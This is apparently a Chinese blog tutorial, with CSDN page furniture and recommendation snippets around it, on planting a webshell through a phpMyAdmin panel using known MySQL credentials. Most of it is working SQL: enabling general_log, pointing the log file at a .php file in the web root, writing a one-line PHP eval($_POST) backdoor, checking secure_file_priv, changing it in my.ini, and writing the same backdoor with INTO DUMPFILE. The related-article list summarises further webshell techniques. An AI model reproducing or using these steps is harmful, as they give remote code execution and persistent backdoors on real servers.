通过phpMyadmin后台获取shell(getshell)

最新推荐文章于 2024-04-21 12:26:02 发布
最新推荐文章于 2024-04-21 12:26:02 发布
阅读量2.2k 收藏 2
点赞数 2
分类专栏: 渗透 getshell 文章标签: mysql shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/110824020
版权

通过phpMyadmin后台获取shell

前提:
1.要知道靶机的mysql用户名和密码
2.能成功登录到靶机phpmyadmin中

先登入对方phpmyadmin

然后找到执行sql语句的框架
1.开启日志

set global general_log='on'

在这里插入图片描述2.指定日志写入的文件,就是一句话木马写入的路径

set global general_log_file ="C:/php/PHPTutorial/WWW/she.php"

注意:一定注意路径的斜杠一定是/不是复制的路径
在这里插入图片描述查看靶机根目录,发现创建成功
在这里插入图片描述3.写入一句话木马

select "<?php eval($_POST['x'])?>"

在这里插入图片描述访问一下
在这里插入图片描述然后获取shell
在这里插入图片描述4.模糊查询嗅探

SHOW VARIABLES LIKE 'general_log%' ;

在这里插入图片描述5.这是查看写入权限的值

SHOW VARIABLES LIKE "secure_file_priv"

在这里插入图片描述要是value为NULL 则代表无法导出
要是value为空值 则代表导出和导入没有限制
要是value为/www 则代表导出和导入只能到www目录中

6.修改secure_file_priv的方式
首先再mysql命令查看

show variables like '%secure%';

在这里插入图片描述

在my.ini下里的[mysqld] 加入 secure_file_priv =
文件位置

在这里插入图片描述添加
在这里插入图片描述重启phpstudy

然后开启
通过dumpfile导出 也可以 使用outfile写入
写入一句话

SELECT "<?php eval($_POST['x']); ?>" INTO dumpfile "C:/phpStudy/PHPTutorial/WWW/tt.php"

然后可以上传此目录

24team
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1765
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
记一次tp5.0.24 getshell1
08-03
"记一次tp5.0.24 getshell" 在这篇文章中,我们将探讨一个关于TP5.0.24版本的getshell漏洞的记录。TP5.0.24是ThinkPHP框架的其中一个版本,该框架是一种流行的PHP开发框架。 首先,我们需要了解TP5.0.24的特点。TP...
PhpMyadmin后台拿webshell方法总结
浅笑996的博客
06-29 3734
前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件写入一句话来获取webshell: (1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
第三方应用类---Phpmyadmin 后台 Getshell 操作
金灰的博客
04-21 451
以Web-Base方式架构在网站主机上的MySQL的数据库管理工具.PhpMyAdmin_百度百科。
phpmyadmin getshell
YouthBelief的博客
11-11 4950
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
PHPmyadmin Getshell
Grey的博客
07-21 6877
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
phpmyadmin常见getshell的方法
Blue的博客
06-10 2469
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
phpmyadminshell
华丽的贵族
10-29 212
secure_file_priv是一个全局变量,是指定文件夹作为导出文件存放的地方,默认情况是一个空置(NULL); 打开后用into outfile 等函数可以将一句话写入secure_file_priv目录下; 1.把secure_file_priv的值设置为网站根目录: set global secure_file_priv=‘C:\phpStudy/PHPTutorial/WWW’; //...
phpMyAdmin getshell总结
zzgslh的博客
04-14 726
phpMyAdmin getshell总结 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 一、phpMyAdmin写权限(into outfile)getshell 利用条件 1.知道网站绝对路径 2.对web目录具有写入权限 3.secure_ file_ priv没有具体值 ...
pma:在Laravel Homestead盒子上安装phpMyAdmin的简单shell脚本
02-04
在本教程中,我们将详细讨论如何在Laravel Homestead上安装和配置phpMyAdmin,这将通过一个简单的shell脚本来实现。 首先,让我们了解Laravel Homestead。它是基于Vagrant和VirtualBox的,允许开发者在虚拟机中运行...
phpMyAdmin通过密码漏洞留后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
bitnami-docker-phpmyadmin:用于phpMyAdmin的Bitnami Docker映像
04-19
可以通过用户界面执行常用操作(管理数据库,表,列,关系,索引,用户,权限等),而您仍然可以直接执行任何SQL语句。 TL; DR Docker撰写 $ curl -sSL ...
php version 拿shell,总结PHPmyadminshell
weixin_39632379的博客
03-24 187
下面由phpmyadmin使用教程栏目给大家总结phpmyadminshell,希望对需要的朋友有所帮助!PHPmyadminshell总结PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' ID...
phpmyadmin getshell总结
good good study
10-25 3078
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1073
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
PhpMyadmin--getshell
qq_64664156的博客
09-20 342
phpMyAdmin通过MySQL日志文件getshell
phpMyAdmin(mysql)常见的写shell方法及版本漏洞汇总
m0_48108919的博客
02-21 7907
目录 前言 一、查看phpMyAdmin版本 二、phpmyadmin常见的getshell方法 1.前提 2.网站物理路径获取方法 3.通过into outfile getshell 4.通过日志文件写 shell 5.通过慢查询写shell 6.创建数据库和表写入webshell 总结 前言 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。 一、查看phpMyAdmin版本 phpMyAdmin是有很多公开漏
shell脚本安装phpmyadmin
最新发布
06-02
安装phpMyAdmin的方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora:yum install php 3.安装apache web服务器(如果尚未安装): - Debian/Ubuntu:apt-get install apache2 - CentOS/Fedora:yum install httpd 4.安装phpMyAdmin: - Debian/Ubuntu:apt-get install phpmyadmin - CentOS/Fedora:yum install phpMyAdmin 5.在安装期间,你可能会被要求输入mysql数据库管理员的用户名和密码。如果你还没有设置它们,请先在mysql中设置一个管理员用户名和密码。 6.启动Web服务器: - Debian/Ubuntu:service apache2 start - CentOS/Fedora:service httpd start

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值